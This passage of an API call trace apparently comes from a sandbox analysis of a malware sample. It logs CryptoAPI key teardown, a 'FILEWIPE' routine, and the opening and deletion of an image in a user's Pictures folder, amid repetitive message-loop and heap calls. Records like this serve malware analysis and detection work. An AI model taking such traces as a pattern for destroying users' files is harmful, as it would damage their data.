wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.621] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.623] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.623] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.623] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.623] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.623] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.623] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0041.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.624] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0041.624] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.624] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.624] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.624] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.624] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.624] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0041.624] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.624] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0041.624] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0041.624] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.625] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.625] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.625] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.625] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.625] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.625] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.625] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.625] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.625] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.625] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.625] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.625] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.625] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.625] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.625] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.626] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.626] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.626] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0041.626] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.626] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.626] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.626] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0041.626] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0041.626] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.626] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.638] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.638] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.639] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.639] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0041.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.642] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.642] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b34ee0, ftCreationTime.dwHighDateTime=0x1d5b629, ftLastAccessTime.dwLowDateTime=0x3a866ae0, ftLastAccessTime.dwHighDateTime=0x1d5c4da, ftLastWriteTime.dwLowDateTime=0x3a866ae0, ftLastWriteTime.dwHighDateTime=0x1d5c4da, nFileSizeHigh=0x0, nFileSizeLow=0x11cf8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Skh73R.png", cAlternateFileName="")) returned 0x7c2240 [0041.644] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.644] CharLowerBuffW (in: lpsz="byte[72952]", cchLength=0xb | out: lpsz="byte[72952]") returned 0xb [0041.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.644] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.644] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.645] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.645] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.645] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.645] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.645] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.645] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.645] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.645] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.646] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.646] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\skh73r.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0041.646] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.646] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.646] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.647] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.647] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.647] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.647] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.648] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.648] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.648] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.648] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png", lpFilePart=0x0) returned 0x31 [0041.648] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b34ee0, ftCreationTime.dwHighDateTime=0x1d5b629, ftLastAccessTime.dwLowDateTime=0x3a866ae0, ftLastAccessTime.dwHighDateTime=0x1d5c4da, ftLastWriteTime.dwLowDateTime=0x18889bc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x11cf8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Skh73R.png", cAlternateFileName="")) returned 0x7c2240 [0041.648] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Skh73R.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\skh73r.png")) returned 1 [0041.650] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b34ee0, ftCreationTime.dwHighDateTime=0x1d5b629, ftLastAccessTime.dwLowDateTime=0x3a866ae0, ftLastAccessTime.dwHighDateTime=0x1d5c4da, ftLastWriteTime.dwLowDateTime=0x18889bc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x11cf8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Skh73R.png", cAlternateFileName="")) returned 0 [0041.650] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.650] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.650] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.650] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.650] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.651] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.651] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.651] PeekMessageW (in: 